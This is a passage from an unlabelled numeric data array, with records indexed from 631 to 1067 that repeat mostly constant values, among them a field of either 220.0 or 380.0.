0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [631, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [632, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [637, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [638, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [639, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [640, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [641, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [642, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [643, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [646, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [647, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [650, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [652, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [655, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [657, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [658, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [661, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [662, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [663, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [666, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [668, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [670, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [672, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [675, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [676, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [677, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [678, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [679, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [681, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [683, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [685, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [687, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [689, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [691, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [693, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [694, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [695, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [696, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [697, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [698, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [701, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [702, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [704, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [705, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [707, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [708, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [711, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [713, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [714, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [716, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [717, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [719, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [721, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [722, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [723, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [724, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [725, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [727, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [728, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [730, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [731, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [732, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [733, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [735, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [737, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [738, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [739, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [741, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [742, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [743, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [745, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [746, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [747, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [748, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [749, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [750, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [753, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [758, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [760, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [761, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [762, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [763, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [765, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [767, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [769, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [771, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [772, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [774, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [776, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [777, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [778, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [781, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [784, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [785, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [787, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [788, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [789, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [790, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [791, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [792, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [793, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [794, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [795, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [796, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [798, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [800, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [801, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [802, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [805, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [806, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [808, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [809, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [811, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [814, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [815, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [816, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [817, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [818, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [821, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [822, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [825, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [826, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [829, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [830, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [832, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [833, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [834, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [835, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [836, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [837, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [839, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [840, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [841, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [842, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [843, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [844, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [845, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [847, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [848, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [849, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [850, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [851, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [852, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [853, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [854, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [855, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [856, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [857, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [858, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [859, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [860, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [862, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [863, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [864, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [865, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [866, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [867, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [869, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [870, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [872, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [873, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [874, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [875, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [877, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [881, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [882, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [883, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [884, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [885, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [886, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [888, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [889, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [890, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [893, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [894, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [895, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [896, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [897, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [898, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [899, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [900, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [902, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [903, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [905, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [906, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [907, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [909, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [911, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [913, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [914, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [915, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [916, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [917, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [918, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [919, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [920, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [921, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [922, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [923, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [924, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [925, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [928, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [931, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [934, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [935, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [936, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [937, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [939, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [940, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [942, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [943, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [944, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [945, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [946, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [948, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [950, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [951, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [952, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [956, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [957, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [958, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [959, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [960, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [963, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [965, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [966, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [967, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [968, 2, 0, 0, 0, 0, 0, 0.999535, 0, 220.0, 0, 1.1, 0.9 ], [969, 2, 0, 0, 0, 0, 0, 0.999535, 0, 220.0, 0, 1.1, 0.9 ], [971, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [973, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [975, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [976, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [977, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [978, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [980, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [981, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [982, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [983, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [984, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [985, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [986, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [987, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [988, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [990, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [993, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [994, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [995, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [996, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [997, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [998, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [999, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1000, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1002, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1003, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1006, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1007, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1008, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1010, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1011, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1012, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1014, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1018, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1019, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1023, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1025, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1026, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1027, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1028, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1029, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1030, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1031, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1032, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1033, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1034, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1035, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1036, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1037, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1038, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1039, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1041, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1042, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1044, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1046, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1047, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1048, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1049, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1050, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1051, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1052, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1053, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1054, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1055, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1056, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1057, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1058, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1059, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1060, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1061, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1062, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1063, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1064, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1065, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1066, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1067, 2, 